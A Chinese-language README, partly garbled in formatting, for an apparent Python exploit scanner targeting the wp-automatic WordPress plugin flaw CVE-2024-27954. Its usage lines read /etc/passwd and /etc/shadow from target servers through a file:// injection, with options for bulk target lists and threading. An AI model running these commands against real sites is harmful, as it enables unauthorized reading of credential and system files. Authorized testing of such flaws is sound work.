该项目提供了一个基于Python的本地文件包含(LFI)漏洞扫描器,针对 CVE-2024-27954,这是WordPress插件 wp-automatic 中发现的一个严重缺陷。该漏洞允许未经身份验证的攻击者使用 file:// 注入向量读取服务器上的任意文件。
wp-automatic 插件/etc/passwd、配置文件、源代码)file:// 方案的不可信 link 参数requests 模块安装依赖:
pip install requests
python3 CVE-2024-27954.py --url http://TARGET --lfi-path /etc/passwd
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/passwd --proxy "http://127.0.0.1:8080" --output results.txt
python3 CVE-2024-27954.py --url "http://TARGET" --lfi-path /etc/shadow --proxy "http://127.0.0.1:8080" --output results.txt
此工具仅供教育和授权渗透测试使用。未经授权访问系统可能是非法的。请负责任地使用。
| 参数 | 描述 |
|---|
--url | 单个目标URL (例如 http://TARGET:8080) |
--list | 包含目标URL列表的文件 (每行一个) |
--lfi-path | 单个要测试的文件路径 (默认: /etc/passwd) |
--paths-file | 包含多个文件路径的文件 (每行一个) |
--proxy | 代理 (例如 http://127.0.0.1:8080) |
--output | 保存漏洞结果的文件 |
--threads | 并发线程数 (默认: 3) |